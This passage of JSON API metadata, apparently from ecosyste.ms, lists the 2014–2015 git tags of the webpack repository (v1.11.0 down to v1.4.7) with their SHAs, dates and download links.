es_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.11.0/manifests"},{"name":"v1.10.5","sha":"c4d78f7ca6e4a20e5b68f2720970a08cadb013e4","kind":"tag","published_at":"2015-07-23T22:04:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.5/manifests"},{"name":"v1.10.4","sha":"107aa63c452d46c0628c53b856bd95e7e3d1b4ed","kind":"tag","published_at":"2015-07-23T21:04:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.4/manifests"},{"name":"v1.10.3","sha":"b99eb70ce63ad33e23e9eef5ee6b4511846acba2","kind":"tag","published_at":"2015-07-22T21:53:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"c2a8b8a843609cbeeeafe92f81894dbe306d38a0","kind":"tag","published_at":"2015-07-22T20:43:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"f711f66f4cec8c72ba6a831eba8e662149508951","kind":"tag","published_at":"2015-07-02T13:25:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"df4e2e4e3df27d682feb962b896595d7eab27c2a","kind":"tag","published_at":"2015-06-27T20:50:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.0/manifests"},{"name":"v1.9.13","sha":"e925c52a0e9fa55b06ffcc3b575e7f1621714056","kind":"tag","published_at":"2015-06-27T09:38:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.13","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.13/manifests"},{"name":"v1.9.12","sha":"ba03fda4b5d2a515ccd87d26f3edd0dd357c4fde","kind":"tag","published_at":"2015-06-24T21:24:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.12","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.12/manifests"},{"name":"v1.9.11","sha":"4c0f4afe8710376726a85c756729dc5e0b86fb95","kind":"tag","published_at":"2015-06-14T10:05:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.11","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.11/manifests"},{"name":"v1.9.10","sha":"4de7bed0f946e42e6dde546ba35233e4eeb87c9d","kind":"tag","published_at":"2015-05-25T19:02:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.10","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.10/manifests"},{"name":"v1.9.9","sha":"407d1bc76b41717a47f87211ffd6cbdfff6c7b1e","kind":"tag","published_at":"2015-05-24T07:35:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.9/manifests"},{"name":"v1.9.8","sha":"69df24cc562c10caf5c02f36459ecacb7cd1823d","kind":"tag","published_at":"2015-05-21T22:16:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.8/manifests"},{"name":"v1.9.7","sha":"0990aaa4754969e34184657577389b88fd845e87","kind":"tag","published_at":"2015-05-17T17:18:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.7/manifests"},{"name":"v1.9.6","sha":"c5eceb0b2cf31fca84e724d3893d44c7042b9038","kind":"tag","published_at":"2015-05-15T15:24:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.6/manifests"},{"name":"v1.9.5","sha":"e37a50683f74d6996373186db757289256a41bf7","kind":"tag","published_at":"2015-05-12T19:21:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.5/manifests"},{"name":"v1.9.4","sha":"ac84ef731540635f615438cc8f4424ff63003ce1","kind":"tag","published_at":"2015-05-10T16:45:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.4/manifests"},{"name":"v1.9.3","sha":"c7ac77fc907950dcf0dc355fae86164f688f9857","kind":"tag","published_at":"2015-05-10T14:44:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.3/manifests"},{"name":"v1.9.2","sha":"0576143e96be118e4621f79db4b8d03b6d2c808e","kind":"tag","published_at":"2015-05-10T12:37:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"98663e71dbacfb82e02379671a821a373150dc7c","kind":"tag","published_at":"2015-05-10T11:53:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"0e21e6ec0b2e4ebc085c9e6ccf823480384e3943","kind":"tag","published_at":"2015-05-10T10:23:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.0/manifests"},{"name":"v1.8.11","sha":"f7d7d30ee647dd8fc77972752d5b9fc47bbe09ea","kind":"tag","published_at":"2015-04-29T10:49:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.11","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.11/manifests"},{"name":"v1.8.10","sha":"8e490bdee33dd4edea82c6d13ba80c6fe3246218","kind":"tag","published_at":"2015-04-26T20:50:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.10","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.10/manifests"},{"name":"v1.8.9","sha":"e4453c78edb4613804c0c0a0e9f447d2def533c3","kind":"tag","published_at":"2015-04-21T21:34:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.9/manifests"},{"name":"v1.8.8","sha":"924e02c98aba21b65d913a1f0e16d8818f018c3b","kind":"tag","published_at":"2015-04-21T06:38:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.8/manifests"},{"name":"v1.8.7","sha":"0bc887a06c7f34a95e2756097f193f15ec1a443d","kind":"tag","published_at":"2015-04-20T18:51:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.7/manifests"},{"name":"v1.8.6","sha":"a27641f8cc68ec557d9ca524afbbfb3b34ec2408","kind":"tag","published_at":"2015-04-20T17:46:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.6/manifests"},{"name":"v1.8.5","sha":"53a534663446bfaa8fc4b3c202542d6a8a2aaadc","kind":"tag","published_at":"2015-04-17T08:26:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.5/manifests"},{"name":"v1.8.4","sha":"bffe6037e99c7a741d64414368295b026d81c81a","kind":"tag","published_at":"2015-04-10T08:23:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.4/manifests"},{"name":"v1.8.3","sha":"13c3a3c3445ac9b76f3fe2602963e8748673b458","kind":"tag","published_at":"2015-04-09T22:19:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.3/manifests"},{"name":"v1.7.4","sha":"43a12294470d9e0337a325095e0fd4a3669ed6c6","kind":"tag","published_at":"2015-04-09T22:14:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.4/manifests"},{"name":"v1.8.2","sha":"4c2b7a9ea5b45481ad408c8275ef58e6140a038f","kind":"tag","published_at":"2015-04-08T13:12:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"af22dce84cb13facf372f179a6a174cafa0397dd","kind":"tag","published_at":"2015-04-08T06:11:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"1f74f58273ae008e315275c6caa31ae3fad42551","kind":"tag","published_at":"2015-04-07T12:34:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.0/manifests"},{"name":"v1.7.3","sha":"b1da5ed5c69f02cb9a4215a56157267b1de9a11b","kind":"commit","published_at":"2015-03-11T22:50:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"17d9dc161c7c8f969d83cb8503fead40db9798d9","kind":"commit","published_at":"2015-03-04T06:45:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"d09c8e713823c705cefea77bc34db6ab0e1cc0c3","kind":"commit","published_at":"2015-03-03T22:41:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.1/manifests"},{"name":"v1.7.0","sha":"e5b5fa6da79def97ac6c1017f3595fcefd5a74dd","kind":"commit","published_at":"2015-03-03T19:43:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.0/manifests"},{"name":"v1.6.0","sha":"ad81998305456c8447ce09d5ef2d4c950f7a4184","kind":"commit","published_at":"2015-02-23T22:02:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.6.0/manifests"},{"name":"v1.5.3","sha":"e46e5cbc514b17cc893dde394edc9a8a25baa5eb","kind":"commit","published_at":"2015-01-21T19:27:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.3/manifests"},{"name":"v1.5.2","sha":"bdabadf34f871fd19b1f960df6b8ab15ea915154","kind":"commit","published_at":"2015-01-21T19:25:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.2/manifests"},{"name":"v1.5.1","sha":"558ee89277d41529ff143af8e050f4c2917ea4b6","kind":"commit","published_at":"2015-01-17T23:50:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.1/manifests"},{"name":"v1.5.0","sha":"0e36e7e936b126dba526bddac557566ee982c432","kind":"commit","published_at":"2015-01-17T22:43:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.0/manifests"},{"name":"v1.4.15","sha":"431bd659be6dcd35fbe993a3a528d5774e82f745","kind":"commit","published_at":"2014-12-28T00:26:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.15","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.15","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.15/manifests"},{"name":"v1.4.14","sha":"6c45e24e4039f7298bfa8ca08a9614abc7aeaf08","kind":"commit","published_at":"2014-12-22T14:29:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.14","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.14","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.14/manifests"},{"name":"v1.4.13","sha":"34c509740b722ac9898ed262f88a8bba9d3237b7","kind":"commit","published_at":"2014-11-05T23:28:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.13","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.13/manifests"},{"name":"v1.4.12","sha":"5edcaea76d900134a50e5a16a07ab5da75c80c6a","kind":"commit","published_at":"2014-11-03T07:10:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.12","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.12/manifests"},{"name":"v1.4.11","sha":"8c606b490b248000466cc5be01019ce7d2eea407","kind":"commit","published_at":"2014-11-02T12:18:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.11","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.11/manifests"},{"name":"v1.4.10","sha":"9a375a770a9b1b235361dcda92844acad196dd47","kind":"commit","published_at":"2014-10-31T11:46:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.10","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.10/manifests"},{"name":"v1.4.9","sha":"b02ef8b2c386d34441af4b42aab248aeed014214","kind":"commit","published_at":"2014-10-26T10:19:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.9/manifests"},{"name":"v1.4.8","sha":"c6e1a8fb6d8714dec5bd05b7a6ae80b71b6e0262","kind":"commit","published_at":"2014-10-16T20:31:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.8/manifests"},{"name":"v1.4.7","sha":"4c0e1974e5c49ee4063cf301d49dc977f77a85b6","kind":"commit","published_at":"2014-10-13T14:10:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.7/mani